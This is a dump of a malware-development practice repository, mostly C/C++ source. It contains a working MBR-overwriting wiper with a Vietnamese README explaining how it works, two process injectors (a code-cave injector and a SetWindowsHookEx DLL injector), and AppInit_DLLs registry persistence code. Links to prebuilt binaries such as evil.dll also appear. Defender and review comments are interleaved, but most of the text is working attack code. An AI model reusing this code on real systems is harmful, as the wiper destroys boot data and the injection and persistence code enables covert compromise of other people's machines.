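BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
{
    HKEY hKey;
    DWORD cbData;
    BOOL written = FALSE;

    if (strData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Size in bytes including the terminator: (characters + 1) * sizeof(WCHAR).
    cbData = ((DWORD)lstrlenW(strData) + 1) * sizeof(WCHAR);
    if (RegSetValueEx(hKey, valueName, 0, REG_SZ, (LPBYTE)strData, cbData) == ERROR_SUCCESS)
        written = TRUE;

    RegCloseKey(hKey);
    return written;
}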
82 |
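/*
 * Read the REG_DWORD value valueName under hKeyParent\subkey into *readData.
 *
 * Fix: the original returned TRUE even when RegQueryValueEx failed, so callers
 * would use an uninitialised *readData; it also accepted any 4-byte value
 * regardless of its registry type. Now TRUE is returned only when the value
 * exists, has type REG_DWORD and was read in full; on failure *readData is
 * left untouched.
 *
 * readData: output pointer; NULL is rejected.
 * Returns TRUE on success, FALSE otherwise. The key handle is always closed.
 */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData)
{
    HKEY hKey;
    DWORD data = 0;
    DWORD len = sizeof(data);   // in: buffer size, out: bytes stored
    DWORD type = REG_NONE;
    BOOL ok = FALSE;

    if (readData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Ask for the type as well so a same-sized value of another type is not
    // silently interpreted as a DWORD.
    if (RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)&data, &len) == ERROR_SUCCESS
        && type == REG_DWORD && len == sizeof(data)) {
        *readData = data;
        ok = TRUE;
    }

    RegCloseKey(hKey);
    return ok;
}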
105 |
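/*
 * Read the string value valueName under hKeyParent\subkey into a newly
 * allocated, NUL-terminated wide-string buffer. On success *readData receives
 * the buffer and the caller releases it with free(); on failure *readData is
 * untouched and no memory is leaked.
 *
 * The buffer starts at TOTAL_BYTES_READ bytes and grows by OFFSET_BYTES while
 * RegQueryValueEx reports ERROR_MORE_DATA.
 *
 * Fixes relative to the original:
 *  - the buffer was allocated as sizeof(PWCHAR)*len bytes while the API was
 *    told it held len bytes (inconsistent sizing);
 *  - a failed realloc overwrote the only pointer to the old buffer;
 *  - the buffer leaked on every error path;
 *  - RegQueryValueEx does not guarantee a terminating NUL, so one is now
 *    written explicitly;
 *  - only REG_SZ and REG_EXPAND_SZ values are accepted.
 *
 * readData: output pointer; NULL is rejected.
 * Returns TRUE on success, FALSE otherwise. The key handle is always closed.
 */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData)
{
    HKEY hKey;
    DWORD len = TOTAL_BYTES_READ;   // capacity of readBuffer, in bytes
    DWORD readDataLen;              // bytes the API needs (ERROR_MORE_DATA) or wrote (success)
    DWORD type = REG_NONE;
    PWCHAR readBuffer;
    PWCHAR grown;
    LONG Ret;
    size_t nChars;

    if (readData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Allocate exactly the capacity reported to the API.
    readBuffer = (PWCHAR)malloc(len);
    if (readBuffer == NULL) {
        RegCloseKey(hKey);
        return FALSE;
    }

    readDataLen = len;
    Ret = RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)readBuffer, &readDataLen);
    while (Ret == ERROR_MORE_DATA) {
        // Keep the old pointer until realloc succeeds so a failure does not leak it.
        len += OFFSET_BYTES;
        grown = (PWCHAR)realloc(readBuffer, len);
        if (grown == NULL) {
            free(readBuffer);
            RegCloseKey(hKey);
            return FALSE;
        }
        readBuffer = grown;
        readDataLen = len;
        Ret = RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)readBuffer, &readDataLen);
    }
    RegCloseKey(hKey);

    if (Ret != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ)) {
        free(readBuffer);
        return FALSE;
    }

    // Guarantee a terminator: the stored data may lack one, and readDataLen may
    // be odd if the value was written byte-wise. Make room for it if needed.
    nChars = readDataLen / sizeof(WCHAR);
    if ((nChars + 1) * sizeof(WCHAR) > len) {
        grown = (PWCHAR)realloc(readBuffer, (nChars + 1) * sizeof(WCHAR));
        if (grown == NULL) {
            free(readBuffer);
            return FALSE;
        }
        readBuffer = grown;
    }
    readBuffer[nChars] = L'\0';

    *readData = readBuffer;
    return TRUE;
}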
140 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/MyRegistry.h:
--------------------------------------------------------------------------------
#pragma once
#include
#include
#include

// Initial buffer size (bytes) used by ReadStringFromRegistry, and the step by
// which that buffer grows while the registry reports ERROR_MORE_DATA.
#define TOTAL_BYTES_READ 1024
#define OFFSET_BYTES 1024

// Registry helpers for the AppInit_DLLs persistence example. subkey is
// relative to hKeyParent (e.g. HKEY_LOCAL_MACHINE); all strings are wide.
// Each helper is meant to return TRUE on success and FALSE on failure —
// NOTE(review): check the .c file, the read helpers did not always honour that.
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
// On success *readData points to a malloc'd buffer that the caller must free().
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/evil.dll
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/resource.h:
--------------------------------------------------------------------------------
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by Ex18_6_Persistence_AppInit_DLLs.rc
//
// Resource id referenced by the .rc above; the "BIN" prefix suggests a raw
// binary resource embedded in the executable — confirm against the .rc and
// the code that loads it. Embedded binaries are worth inspecting when triaging
// a sample of this kind.
#define IDR_BIN1 101

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Evil_WS.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Evil_WS.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/resource.h:
--------------------------------------------------------------------------------
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by Ex18_7_Persistence_Windows_Service.rc
//
// Resource id referenced by the .rc above; the "BIN" prefix suggests a raw
// binary resource embedded in the executable — confirm against the .rc and
// the code that loads it. Embedded binaries are worth inspecting when triaging
// a sample of this kind.
#define IDR_BIN1 101

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex19_Simple_Windows_Service/Ex19_Simple_Windows_Service.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex19_Simple_Windows_Service/Ex19_Simple_Windows_Service.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/mbr-overwriting/README.md:
--------------------------------------------------------------------------------
1 | ### 1. Master Boot Record - MBR
2 | - Là một cấu trúc dữ liệu quan trọng trên ổ đĩa cứng.
3 | - Sector này chứa mã thực thi (executable code), chữ ký (disk signature) và bảng thông tin về các phân vùng (partition table) trên ổ đĩa cứng.
4 | - Có kích thước là 512 bytes. Trong đó:
5 | + 444 bytes đầu là Master Boot Code (executable code)
6 | + 64 bytes tiếp theo là thông tin các phân vùng (partition table)
7 | + 2 bytes cuối là chữ ký, giá trị là: 0x55AA
8 |
9 | ### 2. Hoạt động của MBR
10 | - Hệ thống dựa vào cấu trúc dữ liệu này để tải các phân vùng có trên đĩa cứng.
11 | - Nếu là phân vùng Primary và được Active thì hệ điều hành sẽ trỏ tới file BootLoader để nạp OS có trên phân vùng này.
12 | - Đồng thời cũng tải những phân vùng Primary và Logical khác, như các phân vùng lưu dữ liệu (Không phải vùng cài OS).
13 |
14 | ### 3. Virus ghi đè MBR
15 | - Tạo dữ liệu trắng dùng hàm ZeroMemory(), gọi là đoạn dữ liệu tạm, sẽ dùng để ghi đoạn dữ liệu tạm này vào MBR
16 | ```
17 | char mbrData[MBR_SIZE];
18 | ZeroMemory(&mbrData, (sizeof mbrData));
19 | ```
20 |
21 | - Tiến hành tạo Handle Device của ổ cứng:
22 | ```
23 | HANDLE MasterBootRecord = CreateFile("\\\\.\\PhysicalDrive0"
24 | , GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE
25 | , NULL, OPEN_EXISTING, NULL, NULL);
26 | ```
27 |
28 | - Tiến hành việc ghi vào MBR:
29 | ```
30 | WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL)
31 | ```
32 |
33 | - Lúc này dữ liệu gốc trên Sector này đã bị ghi đè, gây lỗi khởi động hệ điều hành.
34 |
35 | ### 4. Tham khảo
36 | - https://technet.microsoft.com/en-us/library/cc976786.aspx
37 | - https://www.bydavy.com/2012/01/lets-decrypt-a-master-boot-record/
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mbr-overwriting", "mbr-overwriting\mbr-overwriting.vcxproj", "{2B793CFC-E14A-44DA-8536-82698134178E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {2B793CFC-E14A-44DA-8536-82698134178E}.Debug|x64.ActiveCfg = Debug|x64
17 | {2B793CFC-E14A-44DA-8536-82698134178E}.Debug|x86.ActiveCfg = Debug|Win32
18 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x64.ActiveCfg = Release|x64
19 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x64.Build.0 = Release|x64
20 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x86.ActiveCfg = Release|Win32
21 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {30719099-A375-496E-898A-7834F48CCF5C}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting/mbr-overwriting.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | using namespace std;
5 |
6 | #define MBR_SIZE 512
7 |
// Entry point: opens the first physical disk as a raw device and overwrites
// its first MBR_SIZE (512) bytes with zeros — the boot code, disk signature
// and partition table the README describes. Opening a raw drive for writing
// needs an elevated token, which is why the manifest note at the end of the
// file raises the UAC execution level.
// Defender note: a user-mode process writing to \\.\PhysicalDrive* is a
// high-signal wiper indicator and is worth alerting on.
int main()
{
    DWORD write;            // bytes actually written, filled in by WriteFile
    char mbrData[MBR_SIZE]; // one sector of zeros
    ZeroMemory(&mbrData, (sizeof mbrData));

    // Raw handle to the whole first disk; offset 0 is the MBR sector.
    // NOTE(review): the handle is never compared with INVALID_HANDLE_VALUE, so
    // a failed open is only noticed when WriteFile fails below.
    HANDLE MasterBootRecord = CreateFile(L"\\\\.\\PhysicalDrive0"
        , GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE
        , NULL, OPEN_EXISTING, NULL, NULL);

    if (WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL) == TRUE) {
        cout << "MBR is overwrite!";
        Sleep(3000);
        ExitProcess(0);
    }
    else {
        cout << "Fail to overwrite MBR";
        Sleep(3000);
        ExitProcess(0);
    }

    // Unreachable: both branches above end the process with ExitProcess, so
    // the handle is never closed explicitly (the OS reclaims it on exit).
    CloseHandle(MasterBootRecord);

    return EXIT_SUCCESS;
}
33 |
34 | // VS: Project Property > Linker > Manifest File > UAC Execution Level: highestAvailable
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting/mbr-overwriting.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting/mbr-overwriting.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/mbr-overwriting/release/x64/mbr-overwriting.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/mbr-overwriting/release/x64/mbr-overwriting.zip
--------------------------------------------------------------------------------
/process-injection/README.md:
--------------------------------------------------------------------------------
1 | ### Process Injection Techniques
2 | - https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
3 | - https://attack.mitre.org/techniques/T1055/
--------------------------------------------------------------------------------
/process-injection/code-cave-injection/code-cave-injection.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | /*
8 | ** Code Cave - Inject Function to a process
9 | ** - https://youtu.be/0NwlWaT9NEY
10 | */
11 |
// Function-pointer type with MessageBoxA's signature; RemoteThread calls the
// absolute address stored in CaveData::FunctionAddr through it.
// NOTE(review): identifiers beginning with a double underscore are reserved
// for the implementation in C++.
typedef int(__stdcall *__MessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);
13 |
// Plain data block that is copied into the target process and handed to the
// remote thread as its argument: the message-box text, its caption, and the
// address of MessageBoxA to call. Field order matters — the block is copied
// byte-for-byte, so the layout must match on both sides.
struct CaveData
{
    char  Message[512];
    char  Title[256];
    DWORD FunctionAddr;
};
21 |
22 | // Get process id
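// Look up the PID of the first running process whose image name equals
// procname exactly (case-sensitive, e.g. "notepad.exe").
// Returns 0 when procname is NULL, the snapshot cannot be taken, or no
// process matches. The original returned whatever PID happened to be last
// in the enumeration when nothing matched — pointing the caller at an
// unrelated process — and leaked the snapshot handle on every call.
DWORD GetProcessID(const char* procname)
{
    PROCESSENTRY32 pe;
    HANDLE hSnap;
    DWORD pid = 0;

    if (procname == NULL)
        return 0;

    pe.dwSize = sizeof(PROCESSENTRY32);
    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (hSnap == INVALID_HANDLE_VALUE)
        return 0;

    if (Process32First(hSnap, &pe)) {
        do
        {
            if (strcmp(pe.szExeFile, procname) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnap, &pe));
    }
    CloseHandle(hSnap);
    return pid;
}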
39 |
// Thread body that main copies byte-for-byte into the target process (see the
// WriteProcessMemory call there) and starts with CreateRemoteThread. Because it
// executes from a foreign address it must not reference anything in this
// module; it calls MessageBoxA only through the absolute address the caller
// placed in caveData->FunctionAddr.
// NOTE(review): nothing checks that the compiled function fits in the
// sizeof(CaveData) bytes main copies, nor that the compiler emitted no
// position-dependent code — confirm with the build settings used.
DWORD __stdcall RemoteThread(CaveData *caveData)
{
    __MessageBoxA MsgBox = (__MessageBoxA)caveData->FunctionAddr;
    MsgBox(NULL, caveData->Message, caveData->Title, MB_ICONWARNING);
    return EXIT_SUCCESS;
}
46 |
// Entry point: reads a process name from stdin, builds a CaveData block, copies
// the bytes of RemoteThread plus the block into that process and starts a
// thread there. argc/argv are unused.
// Defender note: VirtualAllocEx(PAGE_EXECUTE_READWRITE) followed by
// WriteProcessMemory and CreateRemoteThread against a foreign process is the
// canonical injection chain that EDR telemetry keys on.
int main(int argc, char const *argv[])
{
    system("cls");
    char strTmp[256], ProcessName[256];

    // input process running
    cout << "Example: crackme, basecalc,..." << endl;
    cout << "Enter Process Name: "; rewind(stdin);
    cin.getline(strTmp, sizeof(strTmp));
    // NOTE(review): strcat can overrun strTmp when the typed name is within
    // four characters of the buffer size.
    strcpy(ProcessName, strcat(strTmp, ".exe"));

    cout << "[ STARTING ] Inject Function To Another Process!" << endl;

    CaveData caveData;
    ZeroMemory(&caveData, sizeof(CaveData));

    // copy data
    strcpy(caveData.Message, "Hello Friend!! (o_O)");
    strcpy(caveData.Title, "Process Injection Techniques");

    // get address of MessageBoxA in "user32.dll" — the local address is reused
    // unchanged inside the target process without being validated there
    HINSTANCE hUserModule = LoadLibrary("user32.dll");
    if (!hUserModule)
    {
        cout << "[ ERROR ] Load Library" << endl;
        return 0;
    }

    // FunctionAddr is a 32-bit field, so this cast only preserves the whole
    // pointer in 32-bit builds.
    caveData.FunctionAddr = (DWORD)GetProcAddress(hUserModule, "MessageBoxA");
    FreeLibrary(hUserModule);

    // open target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetProcessID(ProcessName));
    if (!hProcess)
    {
        cout << "[ ERROR ] Open Process" << endl;
        return 0;
    }

    // allocation — NOTE(review): the result is not checked before it is written to
    LPVOID pRemoteThread = VirtualAllocEx(hProcess, NULL, sizeof(CaveData), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // write: copies sizeof(CaveData) bytes of RemoteThread's machine code, a
    // size unrelated to the function's real length
    WriteProcessMemory(hProcess, pRemoteThread, (LPVOID)RemoteThread, sizeof(CaveData), 0);

    // cave code allocation (the data block, kept separate from the code)
    CaveData *pData = (CaveData*)VirtualAllocEx(hProcess, NULL, sizeof(CaveData), MEM_COMMIT, PAGE_READWRITE);

    // write data
    WriteProcessMemory(hProcess, pData, &caveData, sizeof(CaveData), NULL);

    // create remote thread; its argument is the remote copy of caveData
    HANDLE hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, 0);

    // close thread handle (without waiting for the thread to finish)
    CloseHandle(hThread);

    // free the now unused memory
    // NOTE(review): per the VirtualFreeEx documentation MEM_RELEASE expects a
    // size of 0, so this call fails as written; pData is never released at
    // all, and releasing either region while the remote thread may still be
    // running would be a race.
    VirtualFreeEx(hProcess, pRemoteThread, sizeof(CaveData), MEM_RELEASE);
    CloseHandle(hProcess);

    cout << "[ OK ] Code Injection Successful...!" << endl;
    cout << "[ EXIT ] Press any key to exit." << endl;

    getchar();
    return 0;
}
--------------------------------------------------------------------------------
/process-injection/hook-injection/hook-injection.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | /*
8 | ** Hook Injection Via SetWindowsHookEx
9 | ** Reference:
10 | ** [1] - https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
11 | ** [2] - http://www.rohitab.com/discuss/topic/43926-setwindowshookex-dll-injection-my-code-and-some-questions/
12 | ** [3] - https://attack.mitre.org/wiki/Technique/T1055
13 | */
14 |
15 | // Get The Process ID
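// Look up the PID of the first running process whose image name equals
// procname exactly (case-sensitive, e.g. "notepad.exe").
// Returns 0 when procname is NULL, the snapshot cannot be taken, or no
// process matches. The original returned whatever PID happened to be last
// in the enumeration when nothing matched — pointing the caller at an
// unrelated process — and leaked the snapshot handle on every call.
DWORD GetProcessID(const char* procname)
{
    PROCESSENTRY32 pe;
    HANDLE hSnap;
    DWORD pid = 0;

    if (procname == NULL)
        return 0;

    pe.dwSize = sizeof(PROCESSENTRY32);
    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (hSnap == INVALID_HANDLE_VALUE)
        return 0;

    if (Process32First(hSnap, &pe)) {
        do
        {
            if (strcmp(pe.szExeFile, procname) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnap, &pe));
    }
    CloseHandle(hSnap);
    return pid;
}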
32 |
// Entry point: asks for a window title and a DLL path, then installs a
// WH_GETMESSAGE hook on the UI thread owning that window so the system loads
// the DLL into that process (the T1055 pattern cited in the file header).
// argc/argv are unused.
// Defender note: a SetWindowsHookEx hook whose module comes from an unrelated
// process, followed by that module appearing in the target, is the signal to
// look for; GetProcessID in this file is never called.
int main(int argc, char const *argv[])
{
    char ProcessName[512], dllPathTmp[512];
    cout << "Right click Taskbar > Task Manager > View Process running" << endl;
    cout << "Example: Base Calculator, CrackMe v1.0, HxD,..." << endl;
    cout << "Enter Process Name: "; rewind(stdin);
    cin.getline(ProcessName, sizeof(ProcessName));

    // DLL Path
    cout << "Enter DLL Path: ";
    cin.getline(dllPathTmp, sizeof(dllPathTmp));

    cout << "[ Starting ] Hook Injection Via Setwindowshookex" << endl;

    // Finding target window — despite the prompt above, FindWindow matches the
    // window *title*, not the executable name
    HWND hwnd = FindWindow(NULL, ProcessName);
    if (hwnd == NULL) {
        cout << "[ FAILED ] Could not find target window." << endl; return EXIT_FAILURE;
    }

    // Getting the thread of the window and the PID (processID is only filled
    // in, never used)
    DWORD processID = NULL;
    DWORD threadID = GetWindowThreadProcessId(hwnd, &processID);
    if (threadID == NULL) {
        cout << "[ FAILED ] Could not get thread ID of the target window." << endl; return EXIT_FAILURE;
    }

    // Loading DLL into this process only to resolve the export;
    // DONT_RESOLVE_DLL_REFERENCES keeps its DllMain from running here
    HMODULE dll = LoadLibraryEx(dllPathTmp, NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (dll == NULL) {
        cout << "[ FAILED ] The DLL could not be found." << endl; return EXIT_FAILURE;
    }

    // Getting exported function address: using GetProcAddress();
    // NOTE(review): the second `return EXIT_FAILURE;` below is unreachable
    HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "myFunction");
    if (addr == NULL) {
        cout << "[ FAILED ] The function was not found." << endl; return EXIT_FAILURE; return EXIT_FAILURE;
    }

    // Setting the hook in the hook chain
    // Or WH_KEYBOARD if you prefer to trigger the hook manually
    HHOOK handle = SetWindowsHookEx(WH_GETMESSAGE, addr, dll, threadID);
    if (handle == NULL) {
        cout << "[ FAILED ] Couldn't set the hook with SetWindowsHookEx." << endl; return EXIT_FAILURE;
    }

    // Triggering the hook: a posted message makes the target thread run the
    // hook procedure (return value not checked)
    PostThreadMessage(threadID, WM_NULL, NULL, NULL);

    // Waiting for user input to remove the hook
    cout << "[ OK ] Hook set and triggered." << endl;
    cout << "[ >> ] Press any key to unhook (This will unload the DLL)." << endl;
    system("pause > nul");

    // Unhooking
    BOOL unhook = UnhookWindowsHookEx(handle);
    if (unhook == FALSE) {
        cout << "[ FAILED ] Could not remove the hook." << endl; return EXIT_FAILURE;
    }

    cout << "[ OK ] Done. Press any key to exit." << endl;
    system("pause > nul");
    return EXIT_SUCCESS;

    // Unreachable: the function has already returned above. The local
    // LoadLibraryEx handle is also never released with FreeLibrary.
    getchar();
    return 0;
}
--------------------------------------------------------------------------------
/process-injection/registry-modification/registry-modification.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 |
4 | /*
5 | ** Injection And Persistence Via Registry Modification
6 | ** - https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
7 | */
8 |
// Write path as a REG_SZ value named keyName under the already-open hKey.
// NOTE(review): the byte count passed is strlen(path), which omits the
// terminating NUL that REG_SZ data is documented to include, and the
// RegSetValueEx status is discarded so failures (e.g. an invalid hKey) go
// unnoticed.
void SetStringValueKey(HKEY hKey, LPCSTR keyName, const char *path)
{
    RegSetValueEx(hKey, keyName, 0, REG_SZ, (BYTE*)path, strlen(path));
}
// Write data as a REG_DWORD value named keyName under the already-open hKey.
// The RegSetValueEx status is discarded, so failures (e.g. an invalid hKey)
// go unnoticed.
void SetDWORDValueKey(HKEY hKey, LPCSTR keyName, DWORD data)
{
    RegSetValueEx(hKey, keyName, 0, REG_DWORD, (LPBYTE)&data, sizeof(DWORD));
}
17 |
/*
** Entry point. With the "#if 1" block enabled it registers a DLL for AppInit_DLLs
** persistence (MITRE ATT&CK T1546.010): the DLL path is written to the
** AppInit_Dlls value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
** (both the 64-bit view and the Wow6432Node view) and LoadAppInit_DLLs is set to 1,
** the documented switch that makes the loader pull the listed DLLs into processes
** that load user32.dll. The "#if 0" block is the author's cleanup path that deletes
** the copied file and resets both values.
**
** Defender notes: writes to these two values are high-signal and worth alerting on;
** on systems with Secure Boot enabled (Windows 8 and later) AppInit_DLLs loading is
** disabled regardless of these values. All WinMain parameters are unused.
*/
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
#if 1 // Registry Modification
    HKEY hKey1, hKey2;
    long regOpenResult1, regOpenResult2;

    // 32-bit (Wow6432Node) and 64-bit registry views of the same key
    LPCTSTR lpSubKey1 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows";
    LPCTSTR lpSubKey2 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows";

    // NOTE(review): regOpenResult1/2 are stored but never checked, so hKey1/hKey2
    // are used below even when the open failed (e.g. without admin rights)
    regOpenResult1 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey1, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey1);
